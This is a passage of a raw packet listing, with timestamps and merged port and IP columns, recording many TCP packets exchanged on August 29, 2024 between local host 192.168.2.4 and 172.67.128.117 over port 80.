                                  Aug 29, 2024 23:42:07.570029020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570040941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570081949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570087910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570102930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570111990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570115089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570127010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570137978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570149899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570173979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570194006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570291996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570303917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570314884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570326090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570338964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570343971 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570352077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570365906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570375919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570378065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570399046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570425034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570429087 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570436954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570473909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570473909 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570486069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570497036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570509911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570523024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570523024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570550919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570576906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570646048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570657969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570667982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570677996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570691109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570699930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570703030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570733070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570735931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570748091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570782900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570908070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570919991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570930958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570943117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570955038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570957899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.570969105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.570991993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571006060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571160078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571171999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571182013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571193933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571204901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571213961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571218014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571237087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571249962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571260929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571278095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571300983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571398973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571409941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571419954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571430922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571443081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571450949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571453094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571496010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571508884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571664095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571681976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571691990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571707964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571731091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571782112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571794033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571805954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571818113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571831942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571856976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571858883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571871996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571902990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571922064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.571933985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571945906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571958065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571988106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.571996927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572000980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572010040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572026968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572046995 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572077036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572088003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572098970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572108030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572133064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572146893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572156906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572196007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572196007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572208881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572221041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572231054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572242975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572273970 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572300911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572340012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572351933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572362900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572376966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572390079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572391033 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572417021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572426081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572434902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572467089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572501898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572514057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572523117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572552919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572556019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572566986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572577000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572577953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572591066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572607994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572633028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572634935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572643995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572680950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572684050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572691917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572701931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572715044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572730064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572735071 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572755098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572763920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572809935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572820902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572860956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572895050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572907925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572921038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572932959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572942972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.572946072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572966099 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572984934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.572993040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573045015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573137999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573149920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573160887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573173046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573184967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573189974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573198080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573210955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573221922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573225021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573234081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573246002 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573267937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573293924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573425055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573436975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573446989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573466063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573477030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573477983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573492050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573508024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573512077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573519945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.573532104 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.573570013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.658761978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658773899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658791065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658802032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658812046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658828974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658840895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658854008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658869028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658891916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658902884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658914089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658925056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658935070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658946037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658957958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.658993006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.658993006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.658993006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.658993006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.658993006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.658993006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659008026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659012079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659024000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659034014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659045935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659060001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659077883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659090042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659091949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659121990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659199953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659212112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659223080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659235001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659246922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659252882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659257889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659271955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659271955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659305096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659328938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659334898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659384012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659468889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659480095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659490108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659501076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659512043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659519911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659523964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659535885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659548998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659554958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659560919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659574032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659598112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659621000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659758091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659770012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659780979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659791946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659802914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659811020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659816027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659828901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659840107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659846067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659851074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659863949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.659866095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659884930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.659914970 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840182066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840379953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840390921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840400934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840415001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840426922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840430975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840439081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840451956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840461016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840462923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840475082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840487957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840492010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840504885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840516090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840516090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840529919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840536118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840545893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840559959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840574026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840586901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840604067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840648890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840775967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840787888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840797901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840809107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840821028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840828896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840832949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840846062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840854883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840866089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840866089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840879917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840890884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840890884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840903997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840910912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840915918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840929031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840930939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840944052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840951920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840960026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840972900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840991974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841011047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841149092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841223001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841293097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841305017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841322899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841339111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841351986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841356039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841365099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841378927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841383934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841392040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841403961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841403961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841415882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841423035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841429949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841440916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841449976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841454029 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841481924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841501951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841658115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841675997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841691017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841701984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841713905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841715097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841725111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841737032 CEST8049730172.67.128.117192.168.2.4
